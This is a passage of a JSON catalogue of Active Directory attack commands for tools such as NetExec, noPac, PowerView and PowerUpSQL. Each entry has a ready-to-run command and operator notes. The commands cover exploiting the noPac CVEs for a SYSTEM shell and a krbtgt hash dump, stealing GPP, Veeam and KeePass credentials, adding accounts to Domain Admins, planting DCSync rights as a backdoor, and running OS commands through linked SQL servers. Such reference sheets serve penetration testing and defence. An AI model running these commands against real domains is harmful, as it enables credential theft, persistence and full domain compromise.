password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/mssql-protocol/mssql-privesc","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:NetExec-MSSQL-Query","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-MSSQL-Query","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"nxc mssql 10.10.10.1 -u john -p password123 -q \"SELECT @@version\"\n\n# domain (Windows) auth\nnxc mssql 10.10.10.1 -u john -p password123 --windows-auth -q \"SELECT SYSTEM_USER\"","description":"NetExec's mssql protocol authenticates to SQL Server and runs an arbitrary T-SQL statement with -q/--query, printing the result set. It is the quickest way to fingerprint an instance (@@version), enumerate databases, or check the effective privileges of the login. Add -windows-auth to authenticate the domain account over NTLM rather than SQL auth.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/mssql-protocol/authentication","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:NetExec-noPac","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec nopac Module","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M nopac","description":"The NetExec/nxc smb 'nopac' module automates the CVE-2021-42278 + CVE-2021-42287 sAMAccountName spoofing chain from a single authenticated SMB connection. It confirms the DC is vulnerable, creates and renames a machine account, and requests an impersonating service ticket, saving the resulting ccache to disk for reuse with impacket tools. Requires MachineAccountQuota > 0 and a DC missing the November 2021 patches; it is a fast way to validate the primitive during an engagement.\n\nCommand Reference:\n\n\tDomain / DC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB","Kerberos","LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"],"added":true},{"id":"wadcoms:NetExec-SMB-GPPAutologin","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-GPPAutologin","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M gpp_autologin","description":"The gpp_autologin module parses Registry.xml files pushed through Group Policy Preferences in SYSVOL and extracts autologon credentials (DefaultUserName / DefaultPassword) configured for interactive logon. Unlike cpassword these values are stored in cleartext, so no decryption is needed. Any domain account can read SYSVOL, making this a fast credential-hunting check against the domain controller alongside gpp_password.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":["T1552.006"],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/gpp-password","https://attack.mitre.org/techniques/T1552/006/"],"added":true},{"id":"wadcoms:NetExec-SMB-GPPPassword","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-GPPPassword","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M gpp_password","description":"The gpp_password module searches SYSVOL for Group Policy Preferences XML files (Groups.xml, Services.xml, ScheduledTasks.xml, etc.) that contain a cpassword attribute, then decrypts it using the AES key Microsoft published in MSDN. Any authenticated domain user can read SYSVOL, so this is a classic quick win for recovering local admin or service account passwords set via GPP. Microsoft patched (MS14-025) the ability to create new GPP passwords but did not remove existing ones, so legacy cpassword values still linger in many domains.\n\nCommand Reference:\n\n\tDC IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":["T1552.006"],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/gpp-password","https://attack.mitre.org/techniques/T1552/006/"],"added":true},{"id":"wadcoms:NetExec-SMB-KeePassDiscover","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-KeePassDiscover","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery","Credential Access"],"nativeCategory":["Discovery","Credential Access"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M keepass_discover","description":"The keepass_discover module remotely enumerates a target for running KeePass processes and for KeePass.config.xml configuration files, reporting the paths it finds. This is the reconnaissance step before keepass_trigger: you need the config file path to plant a malicious export trigger. Requires local admin on the target so the module can inspect processes and the user's AppData. No database is opened or modified at this stage.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-keepass"],"added":true},{"id":"wadcoms:NetExec-SMB-KeePassTrigger","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-KeePassTrigger","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M keepass_trigger -o KEEPASS_CONFIG_PATH=\"C:\\Users\\john\\AppData\\Roaming\\KeePass\\KeePass.config.xml\"","description":"The keepass_trigger module abuses KeePass's trigger system: it edits KeePass.config.xml (path found via keepass_discover) to add a malicious export trigger, so the next time the victim unlocks their database KeePass silently exports every entry in cleartext to a location the operator can read. The default ACTION=ALL adds the trigger, waits, retrieves and parses the export, then cleans up. Requires local admin on the host and that the user actually opens their vault; it is noisier and higher-risk than passive hunting, so restore the config afterward.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n\n\tKeePass config path: C:\\Users\\john\\AppData\\Roaming\\KeePass\\KeePass.config.xml","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-keepass"],"added":true},{"id":"wadcoms:NetExec-SMB-SpiderPlus","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-SpiderPlus","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Collection","Discovery"],"nativeCategory":["Collection","Discovery"],"command":"# JSON share/file inventory only (metadata, no downloads)\nnxc smb 10.10.10.1 -u john -p password123 -M spider_plus\n\n# Download every readable file under the size limit\nnxc smb 10.10.10.1 -u john -p password123 -M spider_plus -o DOWNLOAD_FLAG=True","description":"The spider_plus module walks every share the authenticated user can read and writes a per-host JSON inventory of file metadata (path, size, ctime/mtime/atime) to the output folder, giving you a fast triage map of what exists before you pull anything down. By default it only catalogs; setting DOWNLOAD_FLAG=True makes it copy files under MAX_FILE_SIZE to the loot folder. Prefer the metadata-only run first to stay quiet and avoid mass file reads. Good starting point for share enumeration at scale with a single low-priv credential.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/spidering-shares"],"added":true},{"id":"wadcoms:NetExec-SMB-Veeam","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-Veeam","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M veeam","description":"The veeam module locates a Veeam Backup & Replication configuration database on the target, reads the stored credential records and decrypts them, recovering the accounts Veeam uses for backups (often domain or local admin). Because backup servers are commonly configured with highly privileged service accounts, this is a frequent path to escalation. Requires local admin on the Veeam server so the module can reach the backing SQL database and DPAPI material.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/obtaining-credentials/veeam"],"added":true},{"id":"wadcoms:Nltest-DomainTrusts-Discovery","toolId":"wadcoms:Nltest","toolName":"Nltest","name":"Nltest-DomainTrusts-Discovery","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Enumeration"],"nativeCategory":["Discovery","Enumeration"],"command":"# List all trust relationships in the forest\nnltest /domain_trusts /all_trusts\n# Enumerate domain controllers for the domain\nnltest /dclist:test.local","description":"nltest.exe is a signed Windows built-in (living-off-the-land) used to map trust relationships and locate domain controllers from an existing foothold, with no third-party tooling dropped to disk. /domain_trusts /all_trusts lists every trust relationship in the forest, and /dclist:<domain> enumerates the DCs for a domain - both useful for planning cross-domain and cross-forest movement. It runs in the current user's context on any domain-joined host.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":["T1482"],"requires":["Shell"],"services":["LDAP","Kerberos"],"references":["https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)","https://attack.mitre.org/techniques/T1482/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:noPac-SAMSpoof","toolId":"wadcoms:noPac","toolName":"noPac","name":"noPac (CVE-2021-42278 + CVE-2021-42287)","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Credential Access"],"nativeCategory":["PrivEsc","Exploitation","Credential Access"],"command":"# Interactive SYSTEM shell on the DC\npython3 noPac.py test.local/john:password123 -dc-ip 10.10.10.1 -dc-host DC01 --impersonate administrator -use-ldap -shell\n\n# Dump the krbtgt hash via secretsdump\npython3 noPac.py test.local/john:password123 -dc-ip 10.10.10.1 -dc-host DC01 --impersonate administrator -use-ldap -dump -just-dc-user krbtgt","description":"noPac.py (Ridter) chains CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion) to escalate from a low-privileged domain user to SYSTEM on the Domain Controller. It adds a new machine account, renames its sAMAccountName to match the DC (dropping the trailing $), requests a TGT, restores the name, then performs S4U2self to obtain a service ticket impersonating a Domain Admin. Requires MachineAccountQuota > 0 (default 10) and a DC unpatched against the November 2021 fixes. Use -shell for an interactive SYSTEM shell via smbexec or -dump to run secretsdump against the DC.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1\n\n\tDC host: DC01\n\n\tImpersonate: administrator","mitre":[],"requires":["Username","Password"],"services":["Kerberos","SMB","LDAP"],"references":["https://github.com/Ridter/noPac","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:noPac-Scanner","toolId":"wadcoms:noPac","toolName":"noPac","name":"noPac Vulnerability Scanner","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"python3 scanner.py test.local/john:password123 -dc-ip 10.10.10.1 -use-ldap","description":"scanner.py ships with Ridter's noPac and safely checks whether a Domain Controller is exploitable via the sAMAccountName spoofing chain without adding or renaming any accounts. It authenticates as a normal domain user and reports the current MachineAccountQuota and whether the DC is patched against CVE-2021-42278 / CVE-2021-42287. Run it first as a low-noise reconnaissance step before launching the full noPac.py exploit.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["Kerberos","LDAP","SMB"],"references":["https://github.com/Ridter/noPac","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"],"added":true},{"id":"wadcoms:PowerMad-NewMachineAccount","toolId":"wadcoms:PowerMad","toolName":"PowerMad","name":"PowerMad-NewMachineAccount","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"# Import Powermad and create a new machine account\nImport-Module .\\Powermad.ps1\nNew-MachineAccount -MachineAccount EVILPC -Password $(ConvertTo-SecureString 'password123' -AsPlainText -Force)","description":"Powermad's New-MachineAccount cmdlet creates a new computer account in the domain over LDAP/SAMR from a Windows foothold, abusing the default ms-DS-MachineAccountQuota (10) that lets any authenticated user add machine accounts. The resulting account, with a password you supply, is the controlled principal for RBCD and shadow-credential chains carried out with SharpAllowedToAct or Rubeus. Run it in-session as any domain user; verify the quota is non-zero first.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tNew machine account: EVILPC\n\n\tPassword: password123","mitre":[],"requires":["PowerShell","Shell"],"services":["LDAP"],"references":["https://github.com/Kevin-Robertson/Powermad","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation"],"added":true},{"id":"wadcoms:PowerUpSQL-Get-SQLServerLinkCrawl","toolId":"wadcoms:PowerUpSQL","toolName":"PowerUpSQL","name":"PowerUpSQL-Get-SQLServerLinkCrawl","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Lateral Movement"],"nativeCategory":["PrivEsc","Lateral Movement"],"command":"Import-Module .\\PowerUpSQL.ps1\n\n# Crawl all linked servers from the starting instance\nGet-SQLServerLinkCrawl -Verbose -Instance 10.10.10.1 -Query \"SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin')\"\n\n# Run an OS command on any node that allows it\nGet-SQLServerLinkCrawl -Verbose -Instance 10.10.10.1 -Query \"exec master..xp_cmdshell 'whoami'\"","description":"Get-SQLServerLinkCrawl recursively follows linked-server definitions from a starting instance, executing a query at every hop via OPENQUERY chains. Because linked servers frequently run under a higher-privileged (often sysadmin) mapped login on the remote side, crawling the graph commonly yields privilege escalation or lateral movement to instances the operator could not reach directly. Supply -Query to fingerprint each node, or drive command execution through xp_cmdshell across the chain.\n\nCommand Reference:\n\n\tTarget instance: 10.10.10.1","mitre":[],"requires":["PowerShell"],"services":["MSSQL"],"references":["https://github.com/NetSPI/PowerUpSQL","https://www.netspi.com/blog/technical-blog/network-penetration-testing/how-to-hack-database-links-in-sql-server/","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:PowerUpSQL-GetSQLInstanceDomain","toolId":"wadcoms:PowerUpSQL","toolName":"PowerUpSQL","name":"PowerUpSQL-GetSQLInstanceDomain","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Enumeration"],"nativeCategory":["Discovery","Enumeration"],"command":"Import-Module .\\PowerUpSQL.ps1\n\n# Discover SQL Server instances from SPNs in the domain\nGet-SQLInstanceDomain\n\n# Then test which ones accept the current user\nGet-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose","description":"Get-SQLInstanceDomain queries the domain via LDAP for Service Principal Names beginning with MSSQL*, revealing every registered SQL Server instance and the account it runs as without touching a single database. It is the standard domain-wide MSSQL discovery step and runs under the current user's context from a domain-joined foothold. Pipe the results into Get-SQLConnectionTestThreaded to find which instances your account can actually log into.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["MSSQL","LDAP"],"references":["https://github.com/NetSPI/PowerUpSQL","https://www.netspi.com/blog/technical-blog/network-penetration-testing/finding-sensitive-data-domain-sql-servers-powerupsql/","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:PowerUpSQL-Invoke-SQLAudit","toolId":"wadcoms:PowerUpSQL","toolName":"PowerUpSQL","name":"PowerUpSQL-Invoke-SQLAudit","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"Import-Module .\\PowerUpSQL.ps1\n\n# Audit an instance for privesc issues\nInvoke-SQLAudit -Verbose -Instance 10.10.10.1\n\n# Execute an OS command through the instance\nInvoke-SQLOSCmd -Verbose -Instance 10.10.10.1 -Command \"whoami\"","description":"Invoke-SQLAudit runs PowerUpSQL's battery of privilege-escalation checks against an instance and reports exploitable misconfigurations (impersonation, trustworthy databases, agent jobs, etc.). Where the login already has the rights, Invoke-SQLOSCmd executes an operating-system command through the instance (using xp_cmdshell), returning output. Both take -Instance in HOST\\INSTANCE or HOST,PORT form and use integrated auth by default.\n\nCommand Reference:\n\n\tTarget instance: 10.10.10.1","mitre":[],"requires":["PowerShell"],"services":["MSSQL"],"references":["https://github.com/NetSPI/PowerUpSQL","https://www.netspi.com/blog/technical-blog/network-penetration-testing/establishing-registry-persistence-via-sql-server-powerupsql/","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:PowerView-AddDomainGroupMember-DA","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-AddDomainGroupMember-DA","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Persistence"],"nativeCategory":["PrivEsc","Persistence"],"command":"Import-Module .\\PowerView.ps1\nAdd-DomainGroupMember -Identity 'Domain Admins' -Members john -Verbose\n# Verify\nGet-DomainGroupMember -Identity 'Domain Admins' | select MemberName","description":"Add-DomainGroupMember adds a principal to a group over LDAP, and when you hold write access to the membership of a privileged group (for example via an abusable GenericAll/WriteMembers ACE) this promotes a controlled account straight into Domain Admins. This is a loud, high-impact change that should be reverted with Remove-DomainGroupMember after the objective; it is often paired with -Credential to act as the principal that actually holds the right.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget group: Domain Admins","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/"],"added":true},{"id":"wadcoms:PowerView-AddDomainObjectAcl-DCSync","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-AddDomainObjectAcl-DCSync","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Credential Access","Privilege Escalation"],"nativeCategory":["Persistence","Credential Access","PrivEsc"],"command":"Import-Module .\\PowerView.ps1\n# Grant john DCSync replication rights on the domain object\nAdd-DomainObjectAcl -TargetIdentity 'DC=test,DC=local' -PrincipalIdentity john -Rights DCSync -Verbose","description":"Add-DomainObjectAcl grants an ACE on a target object to a principal you control. Targeting the domain head with -Rights DCSync adds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, letting your account replicate secrets (a DCSync attack) without being a Domain Admin. This requires that your current context can already write the domain object's DACL (e.g. WriteDacl on the domain), and it is a durable backdoor that should be cleaned up with Remove-DomainObjectAcl.\n\nCommand Reference:\n\n\tPrincipal granted rights: john\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/grant-rights.html"],"added":true},{"id":"wadcoms:PowerView-ASREPRoastable","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-ASREPRoastable","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"Import-Module .\\PowerView.ps1\nGet-DomainUser -PreauthNotRequired -Properties samaccountname,useraccountcontrol -Verbose","description":"Get-DomainUser -PreauthNotRequired finds accounts with the DONT_REQ_PREAUTH flag (userAccountControl bit 0x400000), which are AS-REP roastable because a DC will return an encrypted AS-REP without prior authentication. Use it to identify targets whose AS-REP hash you can then crack offline. This is an LDAP read only; the actual roast is performed with a separate tool such as Rubeus or GetNPUsers.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP","Kerberos"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast"],"added":true},{"id":"wadcoms:PowerView-DomainTrust","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-DomainTrust","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"Import-Module .\\PowerView.ps1\n# Trusts of the current domain\nGet-DomainTrust\n# Forest / inter-forest trusts\nGet-ForestTrust\n# Recursively map every reachable trust\nGet-DomainTrustMapping","description":"Get-DomainTrust enumerates the trust relationships of the current (or a specified) domain, while Get-ForestTrust returns forest-level (inter-forest) trusts. Reading trust direction, transitivity, and SID-filtering state is the first step in planning cross-domain and cross-forest attacks such as foreign group membership abuse or trust-key based ticket forging. Get-DomainTrustMapping walks reachable domains recursively to build the full trust graph.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:PowerView-FindLocalAdminAccess","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-FindLocalAdminAccess","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Lateral Movement"],"nativeCategory":["Discovery","Lateral Movement"],"command":"Import-Module .\\PowerView.ps1\nFind-LocalAdminAccess -Verbose | Out-File output.txt","description":"Find-LocalAdminAccess queries the domain for all computers and then, using the OpenServiceControlManager check, tests each one to see whether the current user context has local administrator access. It is the fastest way to discover where your foothold account can already move laterally without cracking anything. The SCM probes generate authentication traffic to many hosts, so it is not stealthy on a monitored network.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tOutput file: output.txt","mitre":[],"requires":["PowerShell"],"services":["SMB"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:PowerView-GetDomainObjectAcl","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-GetDomainObjectAcl","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Privilege Escalation"],"nativeCategory":["Discovery","PrivEsc"],"command":"Import-Module .\\PowerView.ps1\nGet-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs |\n ? { $_.ActiveDirectoryRights -match 'WriteDacl|WriteOwner|GenericAll|GenericWrite' }","description":"Get-DomainObjectAcl returns the raw DACL for a single object so you can confirm exactly which principals hold which rights over a specific user, group, computer, or the domain head. Pair -Identity with -ResolveGUIDs to expand extended rights such as DS-Replication-Get-Changes (DCSync) or User-Force-Change-Password. This is the targeted follow-up to Find-InterestingDomainAcl when you already know the object you want to attack.\n\nCommand Reference:\n\n\tTarget object: Domain Admins\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/"],"added":true},{"id":"wadcoms:PowerView-GPOLocalGroup","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-GPOLocalGroup","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"Import-Module .\\PowerView.ps1\n# All GPOs in the domain\nGet-DomainGPO -Properties displayname,name\n# GPOs that modify local group membership\nGet-DomainGPOLocalGroup\n# Where does 'john' become a local Administrator via GPO?\nGet-DomainGPOUserLocalGroupMapping -Identity john -LocalGroup Administrators","description":"Get-DomainGPO enumerates every Group Policy Object in the domain, and Get-DomainGPOLocalGroup parses GPOs that use Restricted Groups or Group Policy Preferences to set local group membership (for example local Administrators). Get-DomainGPOUserLocalGroupMapping then resolves which machines a given user or group ends up as local admin on through those GPOs. Together they map the GPO-to-local-admin relationships needed for lateral movement and for finding GPOs worth abusing.\n\nCommand Reference:\n\n\tUsername: john\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993"],"added":true},{"id":"wadcoms:PowerView-InterestingDomainAcl","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-InterestingDomainAcl","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Privilege Escalation"],"nativeCategory":["Discovery","PrivEsc"],"command":"Import-Module .\\PowerView.ps1\nFind-InterestingDomainAcl -ResolveGUIDs |\n ? { $_.IdentityReferenceName -eq 'john' } |\n select ObjectDN, ActiveDirectoryRights, IdentityReferenceName","description":"Find-InterestingDomainAcl surfaces ACEs across the domain that grant modification rights (GenericAll, GenericWrite, WriteDacl, WriteOwner, ResetPassword, etc.) to non-built-in principals, which are the ACL-based privilege escalation paths. The -ResolveGUIDs switch translates extended-right and property-set object GUIDs into human-readable names so DCSync and ForceChangePassword rights are legible. Filtering the output to your controlled principals quickly reveals abusable edges.\n\nCommand Reference:\n\n\tUsername: john","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://www.thehacker.recipes/ad/movement/dacl/","https://wald0.com/?p=112"],"added":true},{"id":"wadcoms:PowerView-InvokeUserHunter","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-InvokeUserHunter","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Lateral Movement"],"nativeCategory":["Discovery","Lateral Movement"],"command":"Import-Module .\\PowerView.ps1\n# Hunt for any Domain Admin session, flag where we already have admin\nInvoke-UserHunter -GroupName 'Domain Admins' -CheckAccess\n# Quieter variant: only query likely session hosts\nInvoke-UserHunter -GroupName 'Domain Admins' -Stealth","description":"Invoke-UserHunter finds machines where a target user (or members of a target group such as Domain Admins) is logged in or has an active session, by combining Get-NetSession, Get-NetLoggedon, and Get-NetComputer across the domain. Adding -CheckAccess also reports whether you already have local admin on the hosts where the target is present, marking immediate credential-theft opportunities. Use -Stealth to only query high-value session hosts (DCs, file servers) and reduce noise.\n\nCommand Reference:\n\n\tTarget group: Domain Admins","mitre":[],"requires":["PowerShell"],"services":["SMB"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:PowerView-Kerberoastable-SPN","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-Kerberoastable-SPN","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Import PowerView into the current session first\nImport-Module .\\PowerView.ps1\n# List every account with an SPN (kerberoastable)\nGet-DomainUser -SPN -Properties samaccountname,serviceprincipalname | Out-File output.txt","description":"PowerView's Get-DomainUser -SPN enumerates domain user accounts that have a servicePrincipalName set, which are the candidates for Kerberoasting. Run it from an existing domain-joined foothold shell to build a target list before requesting service tickets. It only queries LDAP and does not request any TGS, so it is quiet on its own; the noisy step is the later roast.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tOutput file: output.txt","mitre":[],"requires":["PowerShell"],"services":["LDAP","Kerberos"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast"],"added":true},{"id":"wadcoms:PowerView-SetDomainObjectOwner","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-SetDomainObjectOwner","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Persistence"],"nativeCategory":["PrivEsc","Persistence"],"command":"Import-Module .\\PowerView.ps1\n# Take ownership of the target, then we can rewrite its DACL\nSet-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity john -Verbose\nAdd-DomainObjectAcl -TargetIdentity 'Domain Admins' -PrincipalIdentity john -Rights All","description":"Set-DomainObjectOwner changes the owner of an AD object to a principal you control. When you hold WriteOwner over a target, taking ownership lets you then write its DACL (via Add-DomainObjectAcl) and grant yourself full control, chaining a limited ACE into complete object takeover. This is the classic first step of a WriteOwner-to-GenericAll escalation against a privileged group or user.\n\nCommand Reference:\n\n\tNew owner: john\n\n\tTarget object: Domain Admins","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/"],"added":true},{"id":"wadcoms:pre2k-Auth","toolId":"wadcoms:pre2k","toolName":"pre2k","name":"pre2k Authenticated Enumeration","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery","Credential Access"],"nativeCategory":["Discovery","Credential 